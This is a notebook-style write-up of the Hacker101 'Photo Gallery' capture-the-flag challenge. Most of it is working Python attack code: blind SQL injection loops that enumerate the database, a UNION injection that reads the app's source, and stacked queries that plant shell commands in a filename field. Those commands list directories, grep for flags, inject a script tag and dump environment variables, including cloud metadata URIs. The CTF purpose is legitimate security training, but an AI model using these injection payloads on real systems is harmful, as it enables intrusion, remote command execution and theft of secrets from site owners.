# Photo Gallery - Captured flags: 3/3

In [1]:
import requests, time
from requests.utils import quote

url = "https://717636efb809a88c4f9cb2ee04a517b6.ctf.hacker101.com/" # Home page

session = requests.Session()

## 1° Flag caught

In [ ]:
response = session.get(url)
print(response.text)
print(response.cookies)
print(response.headers)

I got the homepage of the web site.

Response's body:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: 0	total</i></div>

	</body>
</html>
```

Cookies: ```[]```\
Headers: ```{'Date': 'Mon, 10 Feb 2025 11:37:19 GMT', 'Content-Type': 'text/html; charset=utf-8', 'Content-Length': '413', 'Connection': 'keep-alive', 'Server': 'openresty/1.27.1.1'}```


I am curios of requesting the first 10 ids... Moreover, I don't understand what 'Space used: 0 total' means... I will find it out!

In [ ]:
for i in range(10):
	print(f"Fetching {i}...")
	response = session.get(url + f"/fetch?id={i}")
	print(response.text[:100])
	time.sleep(1)

Output:
```html
Fetching 0...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 1...
����JFIF�����ExifMM*JR(1Z�ih
Fetching 2...
����JFIF����dExifMM*>F(1N�
Fetching 3...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1
Fetching 4...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 5...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 6...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 7...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 8...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
Fetching 9...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</
```

I see an interesting thing: Id 3 returns an error that differs from the standard 404 status code. I would like to store the two images in files.

In [ ]:
response = session.get(url + f"/fetch?id=1")
with open("image1.html", "wb") as f:
	f.write(response.content)
	# print the first 10 bytes of the image in hex
	print(response.content[:10].hex()) # ffd8ffe000104a464946
	print(response.content[-10:].hex()) # 33229249e68a2803ffd9

time.sleep(1)

response = session.get(url + f"/fetch?id=2")
with open("image2.html", "wb") as f:
	f.write(response.content)
	# print the first 10 bytes of the image in hex
	print(response.content[:10].hex()) # ffd8ffe000104a464946
	print(response.content[-10:].hex()) # 45cab7b0a28a4867ffd9

Images seem to be standard JPEG images. I can say that because both start with the sequence of bytes: FF D8 FF, that is the standard header of JPEG images... So, I am going to try an **SQL Injection** attack

In [ ]:
payload = quote("' or 1=1;--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text)

payload = quote("0 or 1=1;--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

payload = quote("1 UNION SELECT 1;--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

First response:
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request.  Either the server is overloaded or there is an error in the application.</p>
```

Second response:
```html
Various bytes....
```

Third response:
```html
Various bytes....
```

In [ ]:
# Get images signatures

image_1_signature = b""
image_2_signature = b""

response = session.get(url + f"/fetch?id=1")
image_1_signature = response.content[-10:]

response = session.get(url + f"/fetch?id=2")
image_2_signature = response.content[-10:]

print(image_1_signature.hex())
print(image_2_signature.hex())

In [ ]:
# Check if image signatures are unique

response = session.get(url + f"/fetch?id=1")
if image_2_signature not in response.content:
	print("Image 2 signature is unique")
if image_1_signature not in response.content:
	raise Exception("Image 1 signature is wrong")

response = session.get(url + f"/fetch?id=2")
if image_1_signature not in response.content:
	print("Image 1 signature is unique")
if image_2_signature not in response.content:
	raise Exception("Image 2 signature is wrong")

In [8]:
# Check if multiple images can be fetched at once

payload = quote("0 or 1=1;--")
response = session.get(url + f"/fetch?id={payload}")

if image_1_signature in response.content:
	print("Image 1 is in the response")
if image_2_signature in response.content:
	print("Image 2 is in the response")

# Output: Image 1 is in the response... Image 2 not in the response

Let's go looking for the available tables

In [ ]:
import string

table_names = []
tables_to_ignore = "('')"

current_table_name = ""
table_found = False

while True:

	for i in string.ascii_lowercase:
		payload = quote(f"1 AND EXISTS (select table_name from information_schema.tables where table_schema = database() and LOWER(table_name) like '{current_table_name + i}%' and LOWER(table_name) not in {tables_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")
		# Match found
		if image_1_signature in response.content:
			current_table_name += i
			print(current_table_name)

			payload = quote(f"1 AND EXISTS (select table_name from information_schema.tables where table_schema = database() and LOWER(table_name) = '{current_table_name}');--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				table_found = True
				print(f"Table found: {current_table_name}")
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")

			break
		
		# Should be impossible
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")
		
		time.sleep(0.3)

	else:
		raise Exception("No match found")
	

	if table_found:
		table_names.append(current_table_name)
		current_table_name = ""
		table_found = False
		tables_to_ignore = "("

		for t in table_names:
			tables_to_ignore += f"'{t}',"
		
		tables_to_ignore = tables_to_ignore[:-1] + ")"

		payload = quote(f"1 AND NOT EXISTS (select table_name from information_schema.tables where table_schema = database() and LOWER(table_name) not in {tables_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")

		if image_1_signature in response.content:
			print("All tables found")
			break
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")


Output:
```
a
al
alb
albu
album
albums
Table found: albums
p
ph
pho
phot
photo
photos
Table found: photos
All tables found
```

In [ ]:
# Checks if all tables are found with correct case

payload = quote(f"1 AND NOT EXISTS (select table_name from information_schema.tables where table_schema = database() and table_name not in ('photos', 'albums'));--")
response = session.get(url + f"/fetch?id={payload}")

if image_1_signature in response.content:
	print("All tables correctly found")
elif "404 Not Found" not in response.text:
	print(response.text)
	raise Exception("Unexpected response")

Okay, I found the correct table names. They are: 'photos' and 'albums'. Let's go looking for the columns

In [ ]:
import string

table_names = ['albums', 'photos']

for table_name in table_names:
	print(f"Fetching columns for table {table_name}...")

	columns = []
	columns_to_ignore = "('')"

	current_column_name = ""
	column_found = False

	while True:

		for i in string.ascii_lowercase:
			payload = quote(f"1 AND EXISTS (select column_name from information_schema.columns where table_schema = database() and table_name = '{table_name}' and LOWER(column_name) like '{current_column_name + i}%' and LOWER(column_name) not in {columns_to_ignore});--")
			response = session.get(url + f"/fetch?id={payload}")
			# Match found
			if image_1_signature in response.content:
				current_column_name += i
				print(current_column_name)

				payload = quote(f"1 AND EXISTS (select column_name from information_schema.columns where table_schema = database() and table_name = '{table_name}' and LOWER(column_name) = '{current_column_name}');--")
				response = session.get(url + f"/fetch?id={payload}")

				if image_1_signature in response.content:
					column_found = True
					print(f"Column found: {current_column_name}")
				elif "404 Not Found" not in response.text:
					print(response.text)
					raise Exception("Unexpected response")

				break
			
			# Should be impossible
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")
			
			time.sleep(0.3)

		else:
			raise Exception("No match found")
		

		if column_found:
			columns.append(current_column_name)
			current_column_name = ""
			column_found = False
			columns_to_ignore = "("

			for t in columns:
				columns_to_ignore += f"'{t}',"
			
			columns_to_ignore = columns_to_ignore[:-1] + ")"

			payload = quote(f"1 AND NOT EXISTS (select column_name from information_schema.columns where table_schema = database() and table_name = '{table_name}' and LOWER(column_name) not in {columns_to_ignore});--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				print("All columns found")
				break
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")


Output:
```
Fetching columns for table albums...
i
id
Column found: id
t
ti
tit
titl
title
Column found: title
All columns found
Fetching columns for table photos...
f
fi
fil
file
filen
filena
filenam
filename
Column found: filename
i
id
Column found: id
p
pa
par
pare
paren
parent
Column found: parent
t
ti
tit
titl
title
Column found: title
All columns found
```

In [ ]:
# Check if all columns are found with correct case
response = session.get(url + f"/fetch?id=1 AND NOT EXISTS (select column_name from information_schema.columns where table_schema = database() and table_name = 'albums' and column_name not in ('id', 'title'));--")
if image_1_signature in response.content:
	print("All columns correctly found")

response = session.get(url + f"/fetch?id=1 AND NOT EXISTS (select column_name from information_schema.columns where table_schema = database() and table_name = 'photos' and column_name not in ('id', 'parent', 'filename', 'title'));--")
if image_1_signature in response.content:
	print("All columns correctly found")

Okay, I found the correct column names for both the tables. Let's go obtaining the content

In [ ]:
import string


print(f"Fetching titles for table albums...")

columns = []
columns_to_ignore = "('kittens')"

current_column_name = ""
column_found = False

while True:

	for i in string.ascii_lowercase + string.digits + string.whitespace:
		payload = quote(f"1 AND EXISTS (select title from albums where LOWER(title) like '{current_column_name + i}%' and LOWER(title) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")
		# Match found
		if image_1_signature in response.content:
			current_column_name += i
			print(current_column_name)

			payload = quote(f"1 AND EXISTS (select title from albums where LOWER(title) = '{current_column_name}');--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				column_found = True
				print(f"Album's title found: {current_column_name}")
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")

			break
		
		# Should be impossible
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")
		
		time.sleep(0.3)

	else:
		raise Exception("No match found")
	

	if column_found:
		columns.append(current_column_name)
		current_column_name = ""
		column_found = False
		columns_to_ignore = "("

		for t in columns:
			columns_to_ignore += f"'{t}',"
		
		columns_to_ignore = columns_to_ignore[:-1] + ")"

		payload = quote(f"1 AND NOT EXISTS (select title from albums where LOWER(title) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")

		if image_1_signature in response.content:
			print("All titles found")
			break
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")


Album titles available: ```kittens```

In [ ]:
import string


print(f"Fetching filenames for table photos...")

columns = ["c858...4dac", 'files/adorable.jpg', 'files/purrfect.jpg']
columns_to_ignore = "('')"

current_column_name = ""
column_found = False

while True:

	for i in string.ascii_lowercase + string.digits + " !#$&(),/-.;=@^~_":
		payload = quote(f"1 AND EXISTS (select filename from photos where LOWER(filename) like '{current_column_name + i}%' and LOWER(filename) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")
		# Match found
		if image_1_signature in response.content:
			current_column_name += i
			print(current_column_name)

			payload = quote(f"1 AND EXISTS (select filename from photos where LOWER(filename) = '{current_column_name}');--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				column_found = True
				print(f"Photo's filename found: {current_column_name}")
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")

			break
		
		# Should be impossible
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")
		
		time.sleep(0.3)

	else:
		raise Exception("No match found")
	

	if column_found:
		columns.append(current_column_name)
		current_column_name = ""
		column_found = False
		columns_to_ignore = "("

		for t in columns:
			columns_to_ignore += f"'{t}',"
		
		columns_to_ignore = columns_to_ignore[:-1] + ")"

		payload = quote(f"1 AND NOT EXISTS (select filename from photos where LOWER(filename) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")

		if image_1_signature in response.content:
			print("All filenames found")
			break
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")


In [ ]:
import string


print(f"Fetching parent for table photos...")

columns = []
columns_to_ignore = "('1')"

current_column_name = ""
column_found = False

while True:

	for i in string.ascii_lowercase + string.digits + " !#$&(),/-.;=@^~_":
		payload = quote(f"1 AND EXISTS (select parent from photos where LOWER(parent) like '{current_column_name + i}%' and LOWER(parent) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")
		# Match found
		if image_1_signature in response.content:
			current_column_name += i
			print(current_column_name)

			payload = quote(f"1 AND EXISTS (select parent from photos where LOWER(parent) = '{current_column_name}');--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				column_found = True
				print(f"Photo's parent found: {current_column_name}")
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")

			break
		
		# Should be impossible
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")
		
		time.sleep(0.3)

	else:
		raise Exception("No match found")
	

	if column_found:
		columns.append(current_column_name)
		current_column_name = ""
		column_found = False
		columns_to_ignore = "("

		for t in columns:
			columns_to_ignore += f"'{t}',"
		
		columns_to_ignore = columns_to_ignore[:-1] + ")"

		payload = quote(f"1 AND NOT EXISTS (select parent from photos where LOWER(parent) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")

		if image_1_signature in response.content:
			print("All parents found")
			break
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")


In [ ]:
import string


print(f"Fetching title for table photos...")

columns = []
columns_to_ignore = "('Invisible', 'Purrfect', 'Utterly adorable')"

current_column_name = ""
column_found = False

while True:

	for i in string.ascii_lowercase + string.digits + " !#$&(),/-.;=@^~_":
		payload = quote(f"1 AND EXISTS (select title from photos where LOWER(title) like '{current_column_name + i}%' and LOWER(title) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")
		# Match found
		if image_1_signature in response.content:
			current_column_name += i
			print(current_column_name)

			payload = quote(f"1 AND EXISTS (select title from photos where LOWER(title) = '{current_column_name}');--")
			response = session.get(url + f"/fetch?id={payload}")

			if image_1_signature in response.content:
				column_found = True
				print(f"Photo's title found: {current_column_name}")
			elif "404 Not Found" not in response.text:
				print(response.text)
				raise Exception("Unexpected response")

			break
		
		# Should be impossible
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")
		
		time.sleep(0.3)

	else:
		raise Exception("No match found")
	

	if column_found:
		columns.append(current_column_name)
		current_column_name = ""
		column_found = False
		columns_to_ignore = "("

		for t in columns:
			columns_to_ignore += f"'{t}',"
		
		columns_to_ignore = columns_to_ignore[:-1] + ")"

		payload = quote(f"1 AND NOT EXISTS (select title from photos where LOWER(title) not in {columns_to_ignore});--")
		response = session.get(url + f"/fetch?id={payload}")

		if image_1_signature in response.content:
			print("All titles found")
			break
		elif "404 Not Found" not in response.text:
			print(response.text)
			raise Exception("Unexpected response")


Okay, I have explored the entire DB. The first flag was the filename of the image related to the id 3!

## 2° Flag caught

I understood that the query performed by the server is used to get the filename of the image to return... I try to get 'main.py' file from the server (i don't know if it exists)


In [ ]:
payload = quote(f"0 union select 'main.py';--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text)

Response:
```python
from flask import Flask, abort, redirect, request, Response
import base64, json, MySQLdb, os, re, subprocess

app = Flask(__name__)

home = '''
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
$ALBUMS$
	</body>
</html>
'''

viewAlbum = '''
<!doctype html>
<html>
	<head>
		<title>$TITLE$ -- Magical Image Gallery</title>
	</head>
	<body>
		<h1>$TITLE$</h1>
$GALLERY$
	</body>
</html>
'''

def getDb():
	return MySQLdb.connect(host="localhost", user="root", password="", db="level5")

def sanitize(data):
	return data.replace('&', '&amp;').replace('<', '&lt;').replace('>', '&gt;').replace('"', '&quot;')

@app.route('/')
def index():
	cur = getDb().cursor()
	cur.execute('SELECT id, title FROM albums')
	albums = list(cur.fetchall())

	rep = ''
	for id, title in albums:
		rep += '<h2>%s</h2>\n' % sanitize(title)
		rep += '<div>'
		cur.execute('SELECT id, title, filename FROM photos WHERE parent=%s LIMIT 3', (id, ))
		fns = []
		for pid, ptitle, pfn in cur.fetchall():
			rep += '<div><img src="fetch?id=%i" width="266" height="150"><br>%s</div>' % (pid, sanitize(ptitle))
			fns.append(pfn)
		rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'
		rep += '</div>\n'

	return home.replace('$ALBUMS$', rep)

@app.route('/fetch')
def fetch():
	cur = getDb().cursor()
	if cur.execute('SELECT filename FROM photos WHERE id=%s' % request.args['id']) == 0:
		abort(404)

	# It's dangerous to go alone, take this:
	# ^FLAG^...$FLAG$

	return file('./%s' % cur.fetchone()[0].replace('..', ''), 'rb').read()

if __name__ == "__main__":
	app.run(host='0.0.0.0', port=80)
```

First flag caught!

## 3° Flag caught

I am trying to determine the available attack surface:
- I could exploit the cli command executed when loading the homepage
- I could exploit the SQL query to perform additional queries
- I could exploit the file read to read actual files
- I cannot perform XSS attacks because titles are sanitized

In [ ]:
# Try to insert new photo

payload = quote(f"1; insert into photos (id, parent, filename, title) values (4, 1, 'files/adorable.jpg', 'Letff'); COMMIT--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

payload = quote(f"4")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

It worked! I inserted a new image into the db! Now I want to exploit that to attack the du command... The problem is that the select query in the homepage returns the first 3 rows... I need to update the filepath of one of the existing images...

In [ ]:
payload = quote(f"0; update photos set filename = ' >> /dev/null | ls -a / | paste -sd " " - || exit 0 where id = 3'; COMMIT--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: .:-.-..-Dockerfile-files-main.py-main.pyc-prestart.sh-requirements.txt-uwsgi.ini--./files:-.-..-adorable.jpg-purrfect.jpg</i></div>

	</body>
</html>
```

From thi response I can understand the content of the working directory of the system.

In [ ]:
payload = quote(f"0; update photos set filename = ' >> /dev/null | ls -a / | paste -sd " " - || exit 0 where id = 3'; COMMIT--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: .-..-app-bin-boot-dev-entrypoint.sh-etc-home-lib-lib64-media-mnt-opt-proc-root-run-sbin-srv-start.sh-sys-tmp-usr-var</i></div>

	</body>
</html>
```

In [ ]:
payload = quote(f"0; update photos set filename = ' >> /dev/null | pwd | paste -sd " " - || exit 0 where id = 3'; COMMIT--")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: /app</i></div>

	</body>
</html>
```

Current dir is /app

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | grep -R FLAG ./ | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: ./main.py:	# ^FLAG^...$FLAG$</i></div>

	</body>
</html>
```

The only match with the keyword 'FLAG' is the one stored in the main.py file. I try to understand something more by reading the Dockerfile

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | cat Dockerfile | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: FROM tiangolo/uwsgi-nginx-flask:python2.7  WORKDIR /app  RUN apt-get update RUN DEBIAN_FRONTEND=noninteractive apt-get install -y mysql-client mysql-server default-libmysqlclient-dev build-essential  ADD requirements.txt /app/  RUN pip install --trusted-host pypi.python.org -r requirements.txt  ADD . /app</i></div>

	</body>
</html>
```

I didn't find anything that seems to be useful. I try to perform an **XSS** attack.

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | echo "<script>alert(1);</script>" | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: <script>alert(1);</script></i></div>

	</body>
</html>
```

The attack succeded, but no flag has been returned by the challenge! I try to find the flag inside other directories...

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | grep -RF "^FLAG^" /etc | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | grep -RF "^FLAG^" /root | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /bin && grep -RF "^FLAG^" /mnt && grep -RF "^FLAG^" /var) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /boot && grep -RF "^FLAG^" /dev && grep -RF "^FLAG^" /entrypoint.sh) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /lib && grep -RF "^FLAG^" /lib64 && grep -RF "^FLAG^" /media) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /opt && grep -RF "^FLAG^" /proc && grep -RF "^FLAG^" /run) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /sbin && grep -RF "^FLAG^" /srv && grep -RF "^FLAG^" /start.sh) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | (grep -RF "^FLAG^" /tmp && grep -RF "^FLAG^" /user) | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

# Nothing found

I tried to scan the entire system without success... From the dockerfile I feel that if the flag exists, then is contained in the /app dir. I try to read the requirements.txt file.

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | cat requirements.txt | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: Flask mysqlclient pycrypto</i></div>

	</body>
</html>
```

By following the hint provided by Hacker101 website, I try to read the environment vars.

In [ ]:
payload = quote(f"""0; update photos set filename = ' >> /dev/null | env | paste -sd " " - || exit 0 where id = 3'; COMMIT--""")
response = session.get(url + f"/fetch?id={payload}")
print(response.text[0:100])

response = session.get(url)
print(response.text)

Response:
```html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>404 Not Found</title>
<h1>Not Found</

<!doctype html>
<html>
	<head>
		<title>Magical Image Gallery</title>
	</head>
	<body>
		<h1>Magical Image Gallery</h1>
<h2>Kittens</h2>
<div><div><img src="fetch?id=1" width="266" height="150"><br>Utterly adorable</div><div><img src="fetch?id=2" width="266" height="150"><br>Purrfect</div><div><img src="fetch?id=3" width="266" height="150"><br>Invisible</div><i>Space used: PYTHONIOENCODING=UTF-8 UWSGI_ORIGINAL_PROC_NAME=/usr/local/bin/uwsgi SUPERVISOR_GROUP_NAME=uwsgi FLAGS=["^FLAG^...$FLAG$","^FLAG^...$FLAG$","^FLAG^...$FLAG$"] HOSTNAME=ip-10-15-38-19.us-west-2.compute.internal SHLVL=0 PYTHON_PIP_VERSION=18.0 HOME=/root GPG_KEY=C01E1CAD5EA2C4F0B8E3571504C367C218ADD4FF UWSGI_INI=/app/uwsgi.ini AWS_EXECUTION_ENV=AWS_ECS_FARGATE NGINX_MAX_UPLOAD=0 UWSGI_PROCESSES=16 ECS_AGENT_URI=http://169.254.170.2/api/c906dbe5774f40398cd5a4b2a475446b-2858145981 STATIC_URL=/static AWS_DEFAULT_REGION=us-west-2 ECS_CONTAINER_METADATA_URI_V4=http://169.254.170.2/v4/c906dbe5774f40398cd5a4b2a475446b-2858145981 UWSGI_CHEAPER=2 ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/c906dbe5774f40398cd5a4b2a475446b-2858145981 NGINX_VERSION=1.13.12-1~stretch PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin NJS_VERSION=1.13.12.0.2.0-1~stretch LANG=C.UTF-8 SUPERVISOR_ENABLED=1 PYTHON_VERSION=2.7.15 AWS_REGION=us-west-2 NGINX_WORKER_PROCESSES=1 SUPERVISOR_SERVER_URL=unix:///var/run/supervisor.sock SUPERVISOR_PROCESS_NAME=uwsgi LISTEN_PORT=80 STATIC_INDEX=0 PWD=/app STATIC_PATH=/app/static PYTHONPATH=/app UWSGI_RELOADS=0</i></div>
	</body>
</html>
```

I found the third flag between env vars!